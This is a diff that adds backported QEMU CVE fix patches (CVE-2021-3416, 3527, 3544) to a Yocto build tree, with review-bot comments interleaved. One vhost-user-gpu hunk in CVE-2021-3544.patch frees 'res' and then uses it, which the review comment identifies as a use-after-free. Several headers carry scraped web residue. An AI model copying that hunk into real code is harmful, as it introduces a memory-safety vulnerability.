@@ -0,0 +1,42 @@ +From e2a48a3c7cc33dbbe89f896e0f07462cb04ff6b5 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 12:13:22 +0800 +Subject: [PATCH 02/10] e1000: switch to use qemu_receive_packet() for loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [1caff0340f49c93d535c6558a5138d20d475315c] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/e1000.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/e1000.c b/hw/net/e1000.c +index d7d05ae30..cf22c4f07 100644 +--- a/hw/net/e1000.c ++++ b/hw/net/e1000.c +@@ -546,7 +546,7 @@ e1000_send_packet(E1000State *s, const uint8_t *buf, int size) + + NetClientState *nc = qemu_get_queue(s->nic); + if (s->phy_reg[PHY_CTRL] & MII_CR_LOOPBACK) { +- nc->info->receive(nc, buf, size); ++ qemu_receive_packet(nc, buf, size); + } else { + qemu_send_packet(nc, buf, size); + } +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch new file mode 100644 index 0000000000..3fc469e3e3 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch 
@@ -0,0 +1,43 @@ +From c041a4da1ff119715e0ccf2d4a7af62568f17b93 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 12:57:40 +0800 +Subject: [PATCH 03/10] dp8393x: switch to use qemu_receive_packet() for + loopback packet +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [331d2ac9ea307c990dc86e6493e8f0c48d14bb33] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/dp8393x.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/dp8393x.c b/hw/net/dp8393x.c +index 205c0decc..533a8304d 100644 +--- a/hw/net/dp8393x.c ++++ b/hw/net/dp8393x.c +@@ -506,7 +506,7 @@ static void dp8393x_do_transmit_packets(dp8393xState *s) + s->regs[SONIC_TCR] |= SONIC_TCR_CRSL; + if (nc->info->can_receive(nc)) { + s->loopback_packet = 1; +- nc->info->receive(nc, s->tx_buffer, tx_len); ++ qemu_receive_packet(nc, s->tx_buffer, tx_len); + } + } else { + /* Transmit packet */ +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch new file mode 100644 index 0000000000..93202ebcef --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch 
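Review bot: In dp8393x_do_transmit_packets() `s->loopback_packet = 1` is still set before the call, but qemu_receive_packet() can now return 0 without invoking the receive callback, and the result is discarded. If the flag is only cleared inside the device's receive path (not visible in this hunk), it would stay set and could mark a later, non-loopback frame. Checking the result, `if (qemu_receive_packet(nc, s->tx_buffer, tx_len) == 0) { s->loopback_packet = 0; }`, would avoid that; please confirm against the receive routine. The surrounding `nc->info->can_receive(nc)` test also duplicates the check qemu_receive_packet() already performs through qemu_can_receive_packet().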
@@ -0,0 +1,42 @@ +From d465dc79c9ee729d91ef086b993e956b1935be69 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 13:14:35 +0800 +Subject: [PATCH 05/10] sungem: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Reviewed-by: Alistair Francis <alistair.francis@wdc.com> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [8c92060d3c0248bd4d515719a35922cd2391b9b4] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/sungem.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/sungem.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/sungem.c ++++ qemu-4.2.0/hw/net/sungem.c +@@ -305,7 +305,7 @@ static void sungem_send_packet(SunGEMSta + NetClientState *nc = qemu_get_queue(s->nic); + + if (s->macregs[MAC_XIFCFG >> 2] & MAC_XIFCFG_LBCK) { +- nc->info->receive(nc, buf, size); ++ qemu_receive_packet(nc, buf, size); + } else { + qemu_send_packet(nc, buf, size); + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch new file mode 100644 index 0000000000..40b4bd96e7 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch 
@@ -0,0 +1,40 @@ +From c0010f9b2bafe866fe32e3c2688454bc24147136 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 13:27:52 +0800 +Subject: [PATCH 06/10] tx_pkt: switch to use qemu_receive_packet_iov() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_receive_iov() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [8c552542b81e56ff532dd27ec6e5328954bdda73] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/net_tx_pkt.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/net_tx_pkt.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/net_tx_pkt.c ++++ qemu-4.2.0/hw/net/net_tx_pkt.c +@@ -544,7 +544,7 @@ static inline void net_tx_pkt_sendv(stru + NetClientState *nc, const struct iovec *iov, int iov_cnt) + { + if (pkt->is_loopback) { +- nc->info->receive_iov(nc, iov, iov_cnt); ++ qemu_receive_packet_iov(nc, iov, iov_cnt); + } else { + qemu_sendv_packet(nc, iov, iov_cnt); + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch new file mode 100644 index 0000000000..b3b702cca4 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch 
@@ -0,0 +1,42 @@ +From 64b38675c728354e4015e4bec3d975cd4cb8a981 Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov <alxndr@bu.edu> +Date: Fri, 26 Feb 2021 13:47:53 -0500 +Subject: [PATCH 07/10] rtl8139: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Buglink: https://bugs.launchpad.net/qemu/+bug/1910826 +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com +Signed-off-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [5311fb805a4403bba024e83886fa0e7572265de4] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/rtl8139.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/rtl8139.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/rtl8139.c ++++ qemu-4.2.0/hw/net/rtl8139.c +@@ -1793,7 +1793,7 @@ static void rtl8139_transfer_frame(RTL81 + } + + DPRINTF("+++ transmit loopback mode\n"); +- rtl8139_do_receive(qemu_get_queue(s->nic), buf, size, do_interrupt); ++ qemu_receive_packet(qemu_get_queue(s->nic), buf, size); + + if (iov) { + g_free(buf2); diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch new file mode 100644 index 0000000000..ed716468dc --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch 
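Review bot: The old loopback call in rtl8139_transfer_frame() passed `do_interrupt` to rtl8139_do_receive(), and the replacement `qemu_receive_packet(qemu_get_queue(s->nic), buf, size)` has no way to carry it. The frame now reaches the device through its registered receive callback, so whatever interrupt setting that callback uses applies to every loopback frame; the callback is outside this hunk, so the resulting behaviour should be confirmed. If callers with `do_interrupt == 0` exist, this is a functional change beyond the re-entrancy fix and deserves a comment at the call, e.g. `/* do_interrupt is not forwarded: loopback goes through the NIC receive callback */`.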
@@ -0,0 +1,44 @@ +From 023ce62f0a788ad3a8233c7a828554bceeafd031 Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov <alxndr@bu.edu> +Date: Mon, 1 Mar 2021 10:33:34 -0500 +Subject: [PATCH 08/10] pcnet: switch to use qemu_receive_packet() for loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Buglink: https://bugs.launchpad.net/qemu/+bug/1917085 +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com +Signed-off-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [99ccfaa1edafd79f7a3a0ff7b58ae4da7c514928] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/pcnet.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c +index f3f18d859..dcd3fc494 100644 +--- a/hw/net/pcnet.c ++++ b/hw/net/pcnet.c +@@ -1250,7 +1250,7 @@ txagain: + if (BCR_SWSTYLE(s) == 1) + add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS); + s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC; +- pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos); ++ qemu_receive_packet(qemu_get_queue(s->nic), s->buffer, s->xmit_pos); + s->looptest = 0; + } else { + if (s->nic) { +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch new file mode 100644 index 0000000000..f4a985604e --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch 
@@ -0,0 +1,41 @@ +From ecf7e62bb2cb02c9bd40082504ae376f3e19ffd2 Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov <alxndr@bu.edu> +Date: Mon, 1 Mar 2021 14:33:43 -0500 +Subject: [PATCH 09/10] cadence_gem: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Signed-off-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [e73adfbeec9d4e008630c814759052ed945c3fed] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/cadence_gem.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +Index: qemu-4.2.0/hw/net/cadence_gem.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/cadence_gem.c ++++ qemu-4.2.0/hw/net/cadence_gem.c +@@ -1225,7 +1225,7 @@ static void gem_transmit(CadenceGEMState + /* Send the packet somewhere */ + if (s->phy_loop || (s->regs[GEM_NWCTRL] & + GEM_NWCTRL_LOCALLOOP)) { +- gem_receive(qemu_get_queue(s->nic), tx_packet, ++ qemu_receive_packet(qemu_get_queue(s->nic), tx_packet, + total_bytes); + } else { + qemu_send_packet(qemu_get_queue(s->nic), tx_packet, diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch new file mode 100644 index 0000000000..77a5385692 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch 
@@ -0,0 +1,42 @@ +From 05a40b172e4d691371534828078be47e7fff524c Mon Sep 17 00:00:00 2001 +From: Gerd Hoffmann <kraxel@redhat.com> +Date: Mon, 3 May 2021 15:29:15 +0200 +Subject: [PATCH] usb: limit combined packets to 1 MiB (CVE-2021-3527) + +usb-host and usb-redirect try to batch bulk transfers by combining many +small usb packets into a single, large transfer request, to reduce the +overhead and improve performance. + +This patch adds a size limit of 1 MiB for those combined packets to +restrict the host resources the guest can bind that way. + +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> +Message-Id: <20210503132915.2335822-6-kraxel@redhat.com> + +Upstream-Status: Backport +https://gitlab.com/qemu-project/qemu/-/commit/05a40b172e4d691371534828078be47e7fff524c +CVE: CVE-2021-3527 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> + +--- + hw/usb/combined-packet.c | 4 +++- + 1 file changed, 3 insertions(+), 1 deletion(-) + +diff --git a/hw/usb/combined-packet.c b/hw/usb/combined-packet.c +index 5d57e883dc..e56802f89a 100644 +--- a/hw/usb/combined-packet.c ++++ b/hw/usb/combined-packet.c +@@ -171,7 +171,9 @@ void usb_ep_combine_input_packets(USBEndpoint *ep) + if ((p->iov.size % ep->max_packet_size) != 0 || !p->short_not_ok || + next == NULL || + /* Work around for Linux usbfs bulk splitting + migration */ +- (totalsize == (16 * KiB - 36) && p->int_req)) { ++ (totalsize == (16 * KiB - 36) && p->int_req) || ++ /* Next package may grow combined package over 1MiB */ ++ totalsize > 1 * MiB - ep->max_packet_size) { + usb_device_handle_data(ep->dev, first); + assert(first->status == USB_RET_ASYNC); + if (first->combined) { +-- +GitLab + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch new file mode 100644 index 0000000000..6371aced12 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch 
@@ -0,0 +1,59 @@ +From 7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 Mon Sep 17 00:00:00 2001 +From: Gerd Hoffmann <kraxel@redhat.com> +Date: Mon, 3 May 2021 15:29:12 +0200 +Subject: [PATCH] usb/redir: avoid dynamic stack allocation (CVE-2021-3527) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Use autofree heap allocation instead. + +Fixes: 4f4321c11ff ("usb: use iovecs in USBPacket") +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> +Tested-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Message-Id: <20210503132915.2335822-3-kraxel@redhat.com> + +Upstream-Status: Backport +https://gitlab.com/qemu-project/qemu/-/commit/7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 +CVE: CVE-2021-3527 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> + +--- + hw/usb/redirect.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c +index 17f06f3417..6a75b0dc4a 100644 +--- a/hw/usb/redirect.c ++++ b/hw/usb/redirect.c +@@ -620,7 +620,7 @@ static void usbredir_handle_iso_data(USBRedirDevice *dev, USBPacket *p, + .endpoint = ep, + .length = p->iov.size + }; +- uint8_t buf[p->iov.size]; ++ g_autofree uint8_t *buf = g_malloc(p->iov.size); + /* No id, we look at the ep when receiving a status back */ + usb_packet_copy(p, buf, p->iov.size); + usbredirparser_send_iso_packet(dev->parser, 0, &iso_packet, +@@ -818,7 +818,7 @@ static void usbredir_handle_bulk_data(USBRedirDevice *dev, USBPacket *p, + usbredirparser_send_bulk_packet(dev->parser, p->id, + &bulk_packet, NULL, 0); + } else { +- uint8_t buf[size]; ++ g_autofree uint8_t *buf = g_malloc(size); + usb_packet_copy(p, buf, size); + usbredir_log_data(dev, "bulk data out:", buf, size); + usbredirparser_send_bulk_packet(dev->parser, p->id, +@@ -923,7 +923,7 @@ static void usbredir_handle_interrupt_out_data(USBRedirDevice *dev, + USBPacket *p, uint8_t ep) + { + struct 
usb_redir_interrupt_packet_header interrupt_packet; +- uint8_t buf[p->iov.size]; ++ g_autofree uint8_t *buf = g_malloc(p->iov.size); + + DPRINTF("interrupt-out ep %02X len %zd id %"PRIu64"\n", ep, + p->iov.size, p->id); +-- +GitLab + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch new file mode 100644 index 0000000000..1b4fcbfb60 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch @@ -0,0 +1,29 @@ +vhost-user-gpu: fix resource leak in 'vg_resource_create_2d' (CVE-2021-3544) + +Call 'vugbm_buffer_destroy' in error path to avoid resource leak. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang <liq3ea@163.com> +Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: default avatarLi Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-3-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +[vhost-user-gpu does not exist in 4.2.0] +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c +@@ -328,6 +328,7 @@ vg_resource_create_2d(VuGpu *g, + g_critical("%s: resource creation failed %d %d %d", + __func__, c2d.resource_id, c2d.width, c2d.height); + g_free(res); ++ vugbm_buffer_destroy(&res->buffer); + cmd->error = VIRTIO_GPU_RESP_ERR_OUT_OF_MEMORY; + return; + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch new file mode 100644 index 0000000000..36cbb127f8 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch 
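Review bot: The three replacements in hw/usb/redirect.c (usbredir_handle_iso_data, usbredir_handle_bulk_data, usbredir_handle_interrupt_out_data) carry no comment explaining why the buffer moved to the heap, and nothing in these hunks bounds `p->iov.size` or `size`. Those sizes presumably derive from guest-submitted packets, and g_malloc() terminates the process on allocation failure, so an upper bound enforced elsewhere should be confirmed; the 1 MiB limit in CVE-2021-3527-1.patch sits in the input-combining path of a different file. I would add `/* heap, not stack: the size comes from the guest packet */` above each allocation, and name the bound there once it is confirmed. All three functions extend outside their hunks.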
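Review bot: The added `vugbm_buffer_destroy(&res->buffer);` in vg_resource_create_2d() sits after `g_free(res);`, so it passes the address of a member of memory that has just been freed to the destroy routine. That is a use-after-free on the very error path the patch is meant to clean up. The two lines should be in the opposite order: `vugbm_buffer_destroy(&res->buffer);` then `g_free(res);`. It is also worth checking against the upstream commit that this is the intended error branch, since the function continues outside the hunk and the backport appears to have been adapted to qemu-4.2.0.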
@@ -0,0 +1,39 @@ +vhost-user-gpu: fix memory leak in vg_resource_attach_backing (CVE-2021-3544) + + +Check whether the 'res' has already been attach_backing to avoid +memory leak. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang <liq3ea@163.com> +virtio-gpu fix: 204f01b3 + + ("virtio-gpu: fix memory leak + in resource attach backing") + Signed-off-by: default avatarLi Qiang <liq3ea@163.com> + Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com> + Message-Id: <20210516030403.107723-4-liq3ea@163.com> + Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +[vhost-user-gpu does not exist in 4.2.0 context] +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster <akuster@mvista.com> + + +Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c +@@ -468,6 +468,11 @@ vg_resource_attach_backing(VuGpu *g, + return; + } + ++ if (res->iov) { ++ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC; ++ return; ++ } ++ + ret = vg_create_mapping_iov(g, &ab, cmd, &res->iov); + if (ret != 0) { + cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC; diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch new file mode 100644 index 0000000000..c534f4c24f --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch 
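Review bot: This patch file, like CVE-2021-3544.patch, CVE-2021-3544_3.patch and CVE-2021-3544_4.patch, has no From/Date/Subject header, and its `Upstream-Status: Backport` line names no upstream commit, unlike the CVE-2021-3416 patches in the same change. The trailers also contain web-page residue (`Reported-by: default avatarLi Qiang`, `Marc-André Lureau's avatarMarc-André Lureau`), which suggests the text was copied from a rendered page rather than exported from git. For a security backport that makes the change hard to verify against upstream; I would regenerate the header from the upstream commit and record it as `Upstream-Status: Backport [<upstream commit hash>]`. The bracketed remark `[vhost-user-gpu does not exist in 4.2.0 context]` also reads oddly next to a hunk that patches qemu-4.2.0/contrib/vhost-user-gpu/main.c and should be clarified.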
@@ -0,0 +1,39 @@ +vhost-user-gpu: fix memory leak while calling 'vg_resource_unref' (CVE-2021-3544) + +If the guest trigger following sequences, the attach_backing will be leaked: + +vg_resource_create_2d +vg_resource_attach_backing +vg_resource_unref + +This patch fix this by freeing 'res->iov' in vg_resource_destroy. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang <liq3ea@163.com> +virtio-gpu fix: 5e8e3c4c + +("virtio-gpu: fix resource leak +in virgl_cmd_resource_unref") +Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: default avatarLi Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-5-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2021-3544 +[vhost-user-gpu does not exist in the 4.2.0] +Signed-off-by: Armin Kuster <akuster@mvista.com> + +Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c +@@ -379,6 +379,7 @@ vg_resource_destroy(VuGpu *g, + } + + vugbm_buffer_destroy(&res->buffer); ++ g_free(res->iov); + pixman_image_unref(res->image); + QTAILQ_REMOVE(&g->reslist, res, next); + g_free(res); diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch new file mode 100644 index 0000000000..96e36eb854 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch 
@@ -0,0 +1,46 @@ +vhost-user-gpu: fix memory leak in 'virgl_cmd_resource_unref' (CVE-2021-3544) + +The 'res->iov' will be leaked if the guest trigger following sequences: + +virgl_cmd_create_resource_2d +virgl_resource_attach_backing +virgl_cmd_resource_unref + +This patch fixes this. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang <liq3ea@163.com> +virtio-gpu fix: 5e8e3c4c + +("virtio-gpu: fix resource leak +in virgl_cmd_resource_unref" +Signed-off-by: default avatarLi Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-6-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -105,9 +105,16 @@ virgl_cmd_resource_unref(VuGpu *g, + struct virtio_gpu_ctrl_command *cmd) + { + struct virtio_gpu_resource_unref unref; ++ struct iovec *res_iovs = NULL; ++ int num_iovs = 0; + + VUGPU_FILL_CMD(unref); + ++ virgl_renderer_resource_detach_iov(unref.resource_id, ++ &res_iovs, ++ &num_iovs); ++ g_free(res_iovs); ++ + virgl_renderer_resource_unref(unref.resource_id); + } + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch new file mode 100644 index 0000000000..e592ce50e2 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch 
@@ -0,0 +1,47 @@ +From 63736af5a6571d9def93769431e0d7e38c6677bf Mon Sep 17 00:00:00 2001 +From: Li Qiang <liq3ea@163.com> +Date: Sat, 15 May 2021 20:04:01 -0700 +Subject: [PATCH] vhost-user-gpu: fix memory leak in + 'virgl_resource_attach_backing' (CVE-2021-3544) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +If 'virgl_renderer_resource_attach_iov' failed, the 'res_iovs' will +be leaked. + +Fixes: CVE-2021-3544 +Reported-by: Li Qiang <liq3ea@163.com> +virtio-gpu fix: 33243031da ("virtio-gpu-3d: fix memory leak +in resource attach backing") + +Signed-off-by: Li Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-7-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + contrib/vhost-user-gpu/virgl.c | 5 ++++- + 1 file changed, 4 insertions(+), 1 deletion(-) + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -283,8 +283,11 @@ virgl_resource_attach_backing(VuGpu *g, + return; + } + +- virgl_renderer_resource_attach_iov(att_rb.resource_id, ++ ret = virgl_renderer_resource_attach_iov(att_rb.resource_id, + res_iovs, att_rb.nr_entries); ++ if (ret != 0) { ++ g_free(res_iovs); ++ } + } + + static void diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch new file mode 100644 index 0000000000..fcdda64437 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch 
